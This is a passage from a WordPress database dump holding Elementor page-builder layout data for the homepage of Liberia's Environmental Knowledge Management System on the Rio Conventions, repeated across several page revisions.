":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"980014f\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#014421\"},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"title_color\":\"#2df700\",\"description_color\":\"#ffffff\",\"button_background_color\":\"rgba(0,206,27,0.66)\",\"button_background_hover_color\":\"#006400\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(5878,527,'_elementor_version','2.7.5'),(5879,527,'_elementor_template_type','wp-page'),(5881,528,'_wp_page_template','default'),(5882,528,'_elementor_edit_mode','builder');
INSERT INTO `wp_postmeta` VALUES (5883,528,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"400\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-themes\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore Documents Database\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"82036e6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"420de78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"be90f2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ab595a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"69484d6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"748843a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"980014f\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#014421\"},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#2df700\",\"description_color\":\"#ffffff\",\"button_background_color\":\"rgba(0,206,27,0.66)\",\"button_background_hover_color\":\"#006400\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(5884,528,'_elementor_version','2.7.5'),(5885,528,'_elementor_template_type','wp-page'),(5887,529,'_wp_page_template','default'),(5888,529,'_elementor_edit_mode','builder'),(5889,529,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"400\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge 